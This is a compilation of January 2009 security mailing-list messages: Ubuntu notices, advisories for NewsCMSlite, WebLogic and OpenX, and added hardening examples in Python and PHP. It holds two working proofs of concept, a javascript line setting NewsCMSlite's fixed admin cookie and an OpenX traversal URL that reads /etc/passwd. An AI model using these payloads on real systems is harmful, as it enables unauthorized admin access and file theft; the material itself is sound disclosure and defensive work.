
===========================================================
Ubuntu Security Notice USN-711-1           January 26, 2009
ktorrent vulnerabilities
CVE-2008-5905, CVE-2008-5906
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.10:
  ktorrent                        2.2.1-0ubuntu3.1

Ubuntu 8.04 LTS:
  ktorrent                        2.2.5-0ubuntu1.1

Ubuntu 8.10:
  ktorrent                        3.1.2+dfsg.1-0ubuntu2.1

After a standard system upgrade you need to restart KTorrent to effect
the necessary changes.

Details follow:

It was discovered that KTorrent did not properly restrict access when using the
web interface plugin. A remote attacker could use a crafted HTTP request and
upload arbitrary torrent files to trigger the start of downloads and seeding.
(CVE-2008-5905)

It was discovered that KTorrent did not properly handle certain parameters when
using the web interface plugin. A remote attacker could use crafted HTTP
requests to execute arbitrary PHP code. (CVE-2008-5906)



From: riklaunim@gmail.com
To: bugtraq@securityfocus.com
Subject: Re: FUD Forum < 2.7.1 PHP code injection vurnelability
Date: Mon, 26 Jan 2009 21:42:45 -0700

It's a very old one, and it was fixed at the time of reporting to one of the devs.

From: admin@bugreport.ir
To: bugtraq@securityfocus.com
Subject: NewsCMSlite Insecure Cookie Handling
Date: Tue, 27 Jan 2009 10:30:53 +0330

########################## www.BugReport.ir #########################
#
#      AmnPardaz Security Research Team
#
# Title: NewsCMSlite
# Vendor: http://www.katywhitton.com
# Bug: Insecure Cookie Handling
# Exploitation: Remote with browser
# Fix: N/A
# Original Advisory: http://www.bugreport.ir/index_62.htm
###################################################################


####################
- Description:
####################

NewsCMSlite is an easy way to get regularly updated content onto your
site without the need for programming skills or employing a Web
Maintenance engineer.

The system allows you to update your news, articles, diary
etc. dynamically using an Access Database to store the content.

####################
- Vulnerability:
####################

+-->Insecure Cookie Handling

Because of improper access restriction to the administration section,
it is possible to bypass the authentication mechanism and gain access
to the administration section by setting the "loggedIn" cookie to
"xY1zZoPQ".



Code Snippet:
/newsadmin.asp #line:73-101

if pageView="login" THEN
' Nothing
ELSE

if (Request.Cookies("loggedIn")="") OR (Request.Cookies("loggedIn")<>"xY1zZoPQ") THEN
%>
<p><div align="center">
.
.
.
<%
ELSE
%>
<%if pageView="" THEN

' The User is logged in with permission
' to view the admin section so we
' display the article list and
' options menu

####################
- POC:
####################

javascript:document.cookie = "loggedIn=xY1zZoPQ; path=/"

####################
- Solution:
####################

Restrict and grant only trusted users access to the resources. Edit  
the source code to ensure that inputs are properly sanitized.

####################
- Credit :
####################
AmnPardaz Security Research & Penetration Testing Team
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com
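
The check quoted from newsadmin.asp above accepts a fixed cookie value as proof of login, so it is identical for every visitor and independent of any password. The following added example (not part of the advisory and not NewsCMSlite code) models that gate in Python beside a server-side session gate; every name other than the "loggedIn" cookie and its value is hypothetical, and the user record is constructed for the demo.

```python
import hashlib
import hmac
import secrets
import time

MAGIC_COOKIE = "xY1zZoPQ"  # constant taken from the advisory's newsadmin.asp snippet


def vulnerable_is_admin(cookies):
    """Model of the advisory's gate: the cookie value itself is the credential."""
    value = cookies.get("loggedIn", "")
    # Same logic as the ASP: deny if empty OR different from the constant.
    return not (value == "" or value != MAGIC_COOKIE)


def hash_password(password, salt, iterations=100_000):
    """Salted, slow password hash (PBKDF2-HMAC-SHA256)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


class AdminSessions:
    """Hardened gate: the cookie is only a random handle into server-side state."""

    def __init__(self, users, ttl_seconds=900, clock=time.monotonic):
        self._users = users      # username -> (salt, password_hash)
        self._ttl = ttl_seconds
        self._clock = clock
        self._sessions = {}      # token -> (username, expires_at)

    def login(self, username, password):
        # Unknown users still go through the hash so both paths cost the same.
        salt, expected = self._users.get(username, (b"\0" * 16, b""))
        candidate = hash_password(password, salt)
        if not hmac.compare_digest(candidate, expected):
            return None
        token = secrets.token_urlsafe(32)  # fresh 256-bit value per login
        self._sessions[token] = (username, self._clock() + self._ttl)
        return token

    def user_for(self, cookies):
        """Return the logged-in username, or None if the cookie proves nothing."""
        token = cookies.get("session", "")
        entry = self._sessions.get(token)
        if entry is None:
            return None
        username, expires_at = entry
        if self._clock() >= expires_at:
            del self._sessions[token]  # expired sessions are dropped on sight
            return None
        return username

    def logout(self, cookies):
        self._sessions.pop(cookies.get("session", ""), None)


def session_cookie(token):
    """Set-Cookie value: not readable by script, HTTPS only, same-site only."""
    return f"session={token}; Path=/; HttpOnly; Secure; SameSite=Strict"


def make_demo_store(clock=time.monotonic):
    """Constructed sample account used only to exercise the example."""
    salt = secrets.token_bytes(16)
    users = {"editor": (salt, hash_password("constructed-demo-passphrase", salt))}
    return AdminSessions(users, clock=clock)
```

With the session gate, the constant from the advisory is just an unknown token: access depends on a value the server issued after a successful password check and can revoke or expire.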

From: "ACROS Security" <lists@acros.si>
To: <bugtraq@securityfocus.com>, <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>,
<cert@cert.org>, <si-cert@arnes.si>
Subject: ACROS Security: HTML Injection in BEA (Oracle) WebLogic Server Console (ASPR #2009-01-27-1)
Date: Tue, 27 Jan 2009 12:48:58 +0100

=====[BEGIN-ACROS-REPORT]====
PUBLIC

========================================================================
ACROS Security Problem Report #2009-01-27-1
-------------------------------------------------------------------------
ASPR #2009-01-27-1: HTML Injection in BEA WebLogic Server Console
========================================================================
Document ID:     ASPR #2009-01-27-1-PUB
Vendor:          ORACLE (http://www.oracle.com)
Target:          Oracle WebLogic Server 10.0
Impact:          There is an HTML Injection vulnerability in WebLogic
                 Server 10 Administration Console that allows the
                 attacker to gain administrative access to the server.
Severity:        High
Status:          Official patch available, workarounds available
Discovered by:   Sasa Kos of ACROS Security

Current version 
   http://www.acrossecurity.com/aspr/ASPR-2009-01-27-1-PUB.txt


Summary
======
There is an HTML Injection vulnerability in WebLogic Server 10 
Administration Console that allows the attacker to gain administrative 
access to the server. It is possible to craft a URL that will, when
requested from the server, return a document with arbitrarily chosen HTML
injected. An obvious use for this type of vulnerability is cross-site
scripting that can be used, among other things, for obtaining session 
cookies from WebLogic administrators. These cookies, when stolen, provide 
the attacker with administrative access to WebLogic Administration 
Console, compromising the security of the entire web server. 

This vulnerability is exploitable even if the Administration Console is 
only being accessed via HTTPS, and even if the Administrative Port is 
enabled.


Product Coverage
===============
- WebLogic Server 10.0
 
Note: Our tests were only performed on the above product version. Other 
versions may or may not be affected. 


Analysis 
=======
Some URL argument in the WebLogic Server 10 Administration Console is 
not properly sanitized against HTML injection, which allows the attacker 
to introduce additional, malicious HTML to the server's response. The 
most common type of HTML injection is injection of malicious client-side 
script, commonly known as cross-site scripting.

In an actual attack the user would not be required to open URLs specified 
by the attacker. Instead, a malicious web page visited by the logged-in 
WebLogic administrator would mount the entire attack automatically and 
covertly. For instance, a tiny 0x0 pixel iframe could be used for loading 
the URL from the demonstration immediately upon administrator's visit to 
the malicious page, injecting the malicious script to the WebLogic 
server's response. This malicious script would then silently send these 
cookies to the attacker's server, where she could pick them up and use 
them for entering the administrator's session in the Administration 
Console.


Mitigating Factors 
=================
- In order to execute the above attack, the attacker would need to make 
the administrator's browser visit a malicious web page while the 
administrator is logged into the Administration Console. This can be 
achieved using social engineering, network traffic modification or a 
combination of both. 

- If the attacker manages to obtain a valid ADMINCONSOLESESSION cookie 
(and optionally _WL_AUTHCOOKIE_ADMINCONSOLESESSION cookie), these will 
only be useful until the administrator logs out of the Administration 
Console. However, the attacker knowing that might rush to create a new 
administrative user in the console and use that user for WebLogic 
administration after the legitimate administrator has logged off.


Solution 
=======
ORACLE has issued a security bulletin [1] and published a patch which 
fixes this issue.


Workaround 
=========
- WebLogic administrators can be trained not to browse other web pages 
while logged in to the Administration Console. However, since some 
hyperlinks in the console point to servers on the Internet (e.g., 
http://support.bea.com) the attacker could watch the administrator's 
Internet traffic and detect such requests as a strong sign that the 
administrator is currently logged in to the Administration Console. She 
would then slightly modify the Internet server's response so as to include 
the malicious code. Such an attack could only be mounted by attackers 
capable of monitoring and modifying the administrator's Internet traffic 
(most likely an ISP or someone who broke into an ISP). 

- The WebLogic Administration Console can be disabled, which would 
neutralize this vulnerability.



References
=========
[1] Oracle Critical Patch Update Advisory - January 2009
    http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html


Acknowledgments
==============
We would like to acknowledge BEA Systems and Oracle Corporation for 
professional handling of the identified vulnerability.


Contact
======
ACROS d.o.o.
Makedonska ulica 113
SI - 2000 Maribor

e-mail: security@acrossecurity.com
web:    http://www.acrossecurity.com
phone:  +386 2 3000 280
fax:    +386 2 3000 282

ACROS Security PGP Key
   http://www.acrossecurity.com/pgpkey.asc
   [Fingerprint: FE9E 0CFB CE41 36B0 4720 C4F1 38A3 F7DD]

ACROS Security Advisories
   http://www.acrossecurity.com/advisories.htm

ACROS Security Papers
   http://www.acrossecurity.com/papers.htm

ASPR Notification and Publishing Policy
   http://www.acrossecurity.com/asprNotificationAndPublishingPolicy.htm


Disclaimer
=========
The content of this report is purely informational and meant only for the
purpose of education and protection. ACROS d.o.o. shall in no event be
liable for any damage whatsoever, direct or implied, arising from use or
spread of this information. All identifiers (hostnames, IP addresses,
company names, individual names etc.) used in examples and demonstrations
are used only for explanatory purposes and have no connection with any
real host, company or individual. In no event should it be assumed that
use of these names means specific hosts, companies or individuals are
vulnerable to any attacks nor does it mean that they consent to being used
in any vulnerability tests. The use of information in this report is
entirely at user's risk.


Revision History
===============
January 27, 2009: Initial release


Copyright
========
(c) 2009 ACROS d.o.o. Forwarding and publishing of this document is
permitted providing the content between "[BEGIN-ACROS-REPORT]" and
"[END-ACROS-REPORT]" marks remains unchanged.

=====[END-ACROS-REPORT]====

From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: "bugtraq@securityfocus.com" <bugtraq@securityfocus.com>,
full-disclosure@lists.grok.org.uk
Subject: [USN-712-1] Vim vulnerabilities
Date: Tue, 27 Jan 2009 07:53:00 -0500

===========================================================
Ubuntu Security Notice USN-712-1           January 27, 2009
vim vulnerabilities
CVE-2008-2712, CVE-2008-4101
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  vim                             1:6.4-006+2ubuntu6.2
  vim-runtime                     1:6.4-006+2ubuntu6.2

Ubuntu 7.10:
  vim                             1:7.1-056+2ubuntu2.1
  vim-runtime                     1:7.1-056+2ubuntu2.1

Ubuntu 8.04 LTS:
  vim                             1:7.1-138+1ubuntu3.1
  vim-runtime                     1:7.1-138+1ubuntu3.1

Ubuntu 8.10:
  vim                             1:7.1.314-3ubuntu3.1
  vim-runtime                     1:7.1.314-3ubuntu3.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Jan Minar discovered that Vim did not properly sanitize inputs before invoking
the execute or system functions inside Vim scripts. If a user were tricked
into running Vim scripts with a specially crafted input, an attacker could
execute arbitrary code with the privileges of the user invoking the program.
(CVE-2008-2712)

Ben Schmidt discovered that Vim did not properly escape characters when
performing keyword or tag lookups. If a user were tricked into running specially
crafted commands, an attacker could execute arbitrary code with the privileges
of the user invoking the program. (CVE-2008-4101)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.4-006+2ubuntu6.2.diff.gz
      Size/MD5:   199371 085ca7601cc068cc572c8cee1d25529f
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.4-006+2ubuntu6.2.dsc
      Size/MD5:     1331 42f100409e8290158363e03eba87126c
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.4.orig.tar.gz
      Size/MD5:  5740778 b893e7167089e788091f80c72476f0d3

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-doc_6.4-006+2ubuntu6.2_all.deb
      Size/MD5:  1732888 bcbc824e5296fea0ea3dd16b2ca54bc8
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-runtime_6.4-006+2ubuntu6.2_all.deb
      Size/MD5:  3594550 84cc69c7fd6b266f697d189cd67c1f69

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-common_6.4-006+2ubuntu6.2_amd64.deb
      Size/MD5:    83548 8445c214e8f5d3b04077800b3c795799
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gnome_6.4-006+2ubuntu6.2_amd64.deb
      Size/MD5:   844928 1bf3bfb3b3552f2b7f77d9250517cbed
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gui-common_6.4-006+2ubuntu6.2_amd64.deb
      Size/MD5:    70034 7c8e29ed88bde4310459b8adfa6a5243
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-tiny_6.4-006+2ubuntu6.2_amd64.deb
      Size/MD5:   444484 99bd94b62dfb322a66dc1c1a98ef4efb
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.4-006+2ubuntu6.2_amd64.deb
      Size/MD5:   664378 f99c5f44f075e507727cfde6e4f4ac5c
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-gtk_6.4-006+2ubuntu6.2_amd64.deb
      Size/MD5:   842724 3121ac81e306aca18d1ce7a8de71ba9e
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-perl_6.4-006+2ubuntu6.2_amd64.deb
      Size/MD5:   846792 705dcb476de0bb335ffdf74f7f0596a0
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-python_6.4-006+2ubuntu6.2_amd64.deb
      Size/MD5:   842742 98bd00409e7bc852a53ecc019ee89b28
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-ruby_6.4-006+2ubuntu6.2_amd64.deb
      Size/MD5:   838130 6e1b1064fb3aa016ba69fc77b6be912b
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-tcl_6.4-006+2ubuntu6.2_amd64.deb
      Size/MD5:   800738 708dfae6260edef8c7dcc5f8d4cf9c81

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-common_6.4-006+2ubuntu6.2_i386.deb
      Size/MD5:    83114 9831f107a9a9b5544265e2ab53eb5afb
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gnome_6.4-006+2ubuntu6.2_i386.deb
      Size/MD5:   713796 32f00306228eecffa22a77de84ae0949
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gui-common_6.4-006+2ubuntu6.2_i386.deb
      Size/MD5:    70036 ffca389f01faaaf229ed4a016d37274d
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-tiny_6.4-006+2ubuntu6.2_i386.deb
      Size/MD5:   366068 76ea071f100dcad8de93b685b278dcf5
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.4-006+2ubuntu6.2_i386.deb
      Size/MD5:   555212 34446768f4d4bf93e189e9d98752d9a6
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-gtk_6.4-006+2ubuntu6.2_i386.deb
      Size/MD5:   711754 489a955d8ee4716063a3d8cea4499584
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-perl_6.4-006+2ubuntu6.2_i386.deb
      Size/MD5:   718432 5e3a38e1f487af57947bd38d9a0b6bc8
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-python_6.4-006+2ubuntu6.2_i386.deb
      Size/MD5:   711776 5d4887649de172dec2ac677202ab327b
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-ruby_6.4-006+2ubuntu6.2_i386.deb
      Size/MD5:   707540 3a2500bf0437de7d07a1e503e6e54cec
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-tcl_6.4-006+2ubuntu6.2_i386.deb
      Size/MD5:   671316 ddf4437a7aa1d91c99f9233be933e81a

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-common_6.4-006+2ubuntu6.2_powerpc.deb
      Size/MD5:    83524 b1350ec11eab7e0a8c7afb049eff2f5c
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gnome_6.4-006+2ubuntu6.2_powerpc.deb
      Size/MD5:   804090 933bd849bf1d0592dd58a90f8e7a18ab
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-gui-common_6.4-006+2ubuntu6.2_powerpc.deb
      Size/MD5:    70040 0676d5dcf3f7e0076b861f4155fc524e
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim-tiny_6.4-006+2ubuntu6.2_powerpc.deb
      Size/MD5:   419552 33840a53481dcd63a1101fef3cfe30f9
    http://security.ubuntu.com/ubuntu/pool/main/v/vim/vim_6.4-006+2ubuntu6.2_powerpc.deb
      Size/MD5:   631936 35786da23d1d301ca0960ddee36d35d2
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-gtk_6.4-006+2ubuntu6.2_powerpc.deb
      Size/MD5:   801918 c98a917f381fe65b102e8ea39018c96d
    http://security.ubuntu.com/ubuntu/pool/universe/v/vim/vim-perl_6.4-006+2ubuntu6.2_powerpc.deb

Updated packages for Ubuntu 7.10:


Updated packages for Ubuntu 8.04 LTS:


Updated packages for Ubuntu 8.10:





Date: Tue, 27 Jan 2009 16:13:19 +0100
Message-Id: <200901271513.n0RFDJC8028322@ca.secunia.com>
To: bugtraq@securityfocus.com
Subject: Secunia Research: OpenX Multiple Vulnerabilities
From: Secunia Research <remove-vuln@secunia.com>

=====================================================================
                     Secunia Research 27/01/2009

                 - OpenX Multiple Vulnerabilities -

=====================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

=====================================================================
1) Affected Software

* OpenX 2.6.3

NOTE: Other versions may also be affected.

=====================================================================
2) Severity

Rating: Moderately critical
Impact: SQL Injection
        Local File Inclusion
        Cross-Site Scripting
        Cross-Site Request Forgery
Where:  Remote

=====================================================================
3) Vendor's Description of Software

"OpenX is a popular free ad server used to manage the advertising on 
over 100,000 websites in more than 100 countries around the world. Use
OpenX to take control of the advertising on your sites".

Product Link:
http://www.openx.org/

=====================================================================
4) Description of Vulnerabilities

Multiple vulnerabilities have been discovered in OpenX, which can be
exploited by malicious people to conduct cross-site scripting, 
cross-site request forgery, and file inclusion attacks and by 
malicious users to conduct script insertion and SQL injection attacks.

1) Input passed to the "clientid" parameter in
"www/admin/banner-acl.php", "www/admin/banner-edit.php",
"www/admin/campaign-zone.php", "www/admin/advertiser-campaigns.php",
"www/admin/campaign-banners.php", and "www/admin/banner-activate.php"
is not properly sanitised before being returned to the user. This can
be exploited to execute arbitrary HTML and script code in a user's
browser session in the context of an affected site.

2) Input passed to the "orderdirection" and "listorder" parameters in
"www/admin/userlog-index.php" and "www/admin/stats.php" is not 
properly sanitised before being returned to the user. This can be 
exploited to execute arbitrary HTML and script code in a user's 
browser session in the context of an affected site.

3) Input passed to the "origPublisherId" parameter in 
"www/admin/userlog-index.php" is not properly sanitised before being
returned to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in the context of an 
affected site.

4) Input passed to "setPerPage", "day", "period_end", "period_start",
and "statsBreakdown" parameters in "www/admin/stats.php" is not 
properly sanitised before being returned to the user. This can be 
exploited to execute arbitrary HTML and script code in a user's 
browser session in the context of an affected site.

5) Input passed to the "campaignid" parameter in
"www/admin/banner-acl.php", "www/admin/banner-edit.php",
"www/admin/banner-acl.php", "www/admin/campaign-zone.php", and
"www/admin/campaign-banners.php" is not properly sanitised before
being returned to the user. This can be exploited to execute arbitrary
HTML and script code in a user's browser session in the context of an
affected site.

6) Input passed to the "bannerid" parameter in
"www/admin/banner-acl.php" is not properly sanitised before being
returned to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in the context of an
affected site.

7) Input passed to the "affiliateid" parameter in
"www/admin/zone-probability.php", "www/admin/zone-invocation.php",
"www/admin/affiliate-zones.php", and "www/admin/zone-include.php" is
not properly sanitised before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's
browser session in the context of an affected site.

8) Input passed to the "zoneid" parameter in
"www/admin/zone-probability.php", "www/admin/zone-invocation.php", and
"www/admin/zone-include.php" is not properly sanitised before being
returned to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in the context of an
affected site.

9) Input passed to the "userid" parameter in
"www/admin/admin-user.php" is not properly sanitised before being
returned to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in the context of an
affected site.

10) Input passed to the "thirdpartytrack" parameter in 
"www/admin/admin-generate.php" is not properly sanitised before being
returned to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in the context of an 
affected site.

11) Input passed to the "agencyid" parameter in
"www/admin/agency-edit.php" is not properly sanitised before being
returned to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in the context of an
affected site.

12) Input passed to the "codetype" parameter in
"www/admin/affiliate-preview.php" is not properly sanitised before
being returned to the user. This can be exploited to execute arbitrary
HTML and script code in a user's browser session in the context of an
affected site.

13) The application allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the
requests. This can be exploited to e.g. perform script insertion
attacks via the "timezone" parameter in
www/admin/account-preferences-timezone.php by tricking the user into
visiting a malicious web site.

14) Input passed to the "name" and "description" parameters in 
"www/admin/channel-edit.php" is not properly sanitised before being 
used. This can be exploited to insert arbitrary HTML and script code,
which is executed in a user's browser session in the context of an 
affected site when the malicious entry is viewed.

15) Input passed to the "campaignid" parameter in
"www/admin/banner-acl.php", "www/admin/campaign-edit.php", and
"www/admin/banner-edit.php" is not properly sanitised before being
used in SQL queries. This can be exploited to manipulate SQL queries
by injecting arbitrary SQL code.

16) Input passed to the "bannerid" parameter in
"www/admin/banner-acl.php" is not properly sanitised before being used
in SQL queries. This can be exploited to manipulate SQL queries by
injecting arbitrary SQL code.

17) Input passed to the "listorder" parameter in
"www/admin/userlog-index.php" is not properly sanitised before being
used in SQL queries. This can be exploited to manipulate SQL queries
by injecting arbitrary SQL code.

18) Input passed to the "affiliateid" parameter in
"www/admin/zone-probability.php", "www/admin/channel-edit.php",
"www/admin/zone-invocation.php", and "www/admin/zone-include.php" is
not properly sanitised before being used in SQL queries. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.

19) Input passed to the "clientid" parameter in
"www/admin/campaign-banners.php" is not properly sanitised before
being used in SQL queries. This can be exploited to manipulate SQL
queries by injecting arbitrary SQL code.

20) Input passed to the "zoneid" parameter in
"www/admin/zone-delete.php" and "www/admin/zone-include.php" is not
properly sanitised before being used in SQL queries. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.

21) Input passed to the "channelid" parameter in
"www/admin/channel-acl.php" is not properly sanitised before being
used in SQL queries. This can be exploited to manipulate SQL queries
by injecting arbitrary SQL code.

22) Input passed to the "MAX_type" parameter in "www/delivery/fc.php"
and to the "lang" parameter in "www/admin/numberFormat.js.php" is not
properly verified before being used to include files. This can be 
exploited to include arbitrary files from local resources via 
directory traversal attacks.

=====================================================================
5) Solution

Use another product.

=====================================================================
6) Time Table

20/01/2009 - Vendor notified (requested security contact).
20/01/2009 - Vendor informs that request has been passed on to 
             engineering team.
26/01/2009 - Third party publicly reports some of the vulnerabilities.
27/01/2009 - Public disclosure.

=====================================================================
7) Credits

Discovered by Sarid Harper, Secunia.

=====================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has not yet
assigned CVE identifiers for the vulnerabilities.

=====================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

=====================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-4/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

=====================================================================
From - Tue Jan 27 11:18:38 2009
Date: 27 Jan 2009 00:20:48 -0000
Message-ID: <20090127002048.10726.qmail@securityfocus.com>
From: admin@elites0ft.com
To: bugtraq@securityfocus.com
Subject: OpenX 2.6.3 - Local File Inclusion

I have found a local file inclusion exploit in OpenX 2.6.3; this is in the script "fc.php", located in /www/delivery/

Here is a snip of the code:
[snip]
include_once '../../init-delivery.php';
$MAX_PLUGINS_AD_PLUGIN_NAME = 'MAX_type';
if(!isset($_GET[$MAX_PLUGINS_AD_PLUGIN_NAME])) {
    echo $MAX_PLUGINS_AD_PLUGIN_NAME . ' is not specified';
    exit(1);
}
// $tagName is taken from the query string without any validation
$tagName = $_GET[$MAX_PLUGINS_AD_PLUGIN_NAME];
// ...and is concatenated directly into the path that is later included
$tagFileName = MAX_PATH . '/plugins/invocationTags/'.$tagName.'/'.$tagName.'.delivery.php';
if(!file_exists($tagFileName)) {
    echo 'Invocation plugin delivery file "' . $tagFileName . '" doesn\'t exists';
    exit(1);
}
include $tagFileName;
[/snip]

As you can see, it is checking whether the file you have inputted exists. This can be exploited like so:

http://host/path/to/openx/www/delivery/fc.php??MAX_type=../../../../../../../../../../../../../../etc/passwd%00

Enjoy.

-Charlie
[Elites0ft.com]
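
A hardened form of the name-to-path step shown in the snippet above (the "MAX_type" issue also listed as item 22 of the Secunia advisory), given here as an added example that is not OpenX code or the vendor's fix. The function name, the 64-character limit, the assumption that plugin names use only letters, digits and underscore, and the demo plugin tree are all assumptions made for illustration.

```php
<?php
// Added example (not OpenX code): resolve an invocation-tag plugin name to a
// file that is guaranteed to live under the plugin directory.

/**
 * Returns the absolute path of the plugin's delivery file, or null when the
 * name is not acceptable or the file is not inside $pluginRoot.
 * Hypothetical helper; the name and limits are assumptions.
 */
function resolve_delivery_plugin($tagName, $pluginRoot)
{
    // 1. Allowlist the name (assumption: letters, digits, underscore only).
    //    This rejects "/", "\", ".", "%" and the NUL byte. \A and \z anchor
    //    the whole string; "$" would accept a trailing newline.
    if (!is_string($tagName)
        || preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $tagName) !== 1) {
        return null;
    }

    // 2. Canonicalise the root once; fail closed if it does not exist.
    $root = realpath($pluginRoot);
    if ($root === false) {
        return null;
    }

    // 3. Build the candidate the same way fc.php does, then canonicalise it.
    $candidate = $root . DIRECTORY_SEPARATOR . $tagName
               . DIRECTORY_SEPARATOR . $tagName . '.delivery.php';
    $real = realpath($candidate);          // false when the file is missing
    if ($real === false || !is_file($real)) {
        return null;
    }

    // 4. Containment check: the resolved path must still sit under the root.
    //    This catches symlinks that point outside the plugin tree.
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// --- Demonstration on a constructed plugin tree in the temp directory ---
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'plugins_demo_' . getmypid();
mkdir($root . DIRECTORY_SEPARATOR . 'exampletag', 0700, true);
$stub = $root . '/exampletag/exampletag.delivery.php';
file_put_contents($stub, "<?php // constructed stub\n");

// Constructed inputs; the second has the shape of the request in the post.
$inputs = array(
    'exampletag',                     // legitimate plugin name
    '../../../../etc/passwd' . "\0",  // traversal plus NUL byte
    'exampletag/../exampletag',       // traversal that stays inside the tree
    "exampletag\n",                   // trailing newline
    array('exampletag'),              // MAX_type[]=... arrives as an array
);
foreach ($inputs as $in) {
    $path = resolve_delivery_plugin($in, $root);
    printf("%-40s => %s\n", json_encode($in),
           $path === null ? 'rejected' : 'include ' . $path);
}

// Clean up the constructed tree.
unlink($stub);
rmdir($root . '/exampletag');
rmdir($root);
```

Only the first input resolves to a path; the caller should include the returned value and treat null as a 404 without echoing the requested name back.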

From - Tue Jan 27 11:38:38 2009
Subject: CA20090123-01: Cohesion Tomcat Multiple Vulnerabilities (Updated - v1.1)
Date: Mon, 26 Jan 2009 19:26:13 -0500
Message-ID: <649CDCB56C88AA458EFF2CBF494B6204063DC017@USILMS12.ca.com>
From: "Williams, James K" <James.Williams@ca.com>
To: <bugtraq@securityfocus.com>

Title: CA20090123-01: Cohesion Tomcat Multiple Vulnerabilities


CA Advisory Reference: CA20090123-01


CA Advisory Date: 2009-01-23


Reported By: n/a


Impact: Refer to the CVE identifiers for details.


Summary: Multiple security risks exist in Apache Tomcat as 
included with CA Cohesion Application Configuration Manager. CA 
has issued an update to address the vulnerabilities. Refer to the 
References section for the full list of resolved issues by CVE 
identifier.


Mitigating Factors: None


Severity: CA has given these vulnerabilities a Medium risk rating.


Affected Products:
CA Cohesion Application Configuration Manager 4.5


Non-Affected Products
CA Cohesion Application Configuration Manager 4.5 SP1


Affected Platforms:
Windows


Status and Recommendation:
CA has issued the following update to address the vulnerabilities.

CA Cohesion Application Configuration Manager 4.5:

RO04648
https://support.ca.com/irj/portal/anonymous/redirArticles?reqPage=search&searchID=RO04648


How to determine if you are affected:

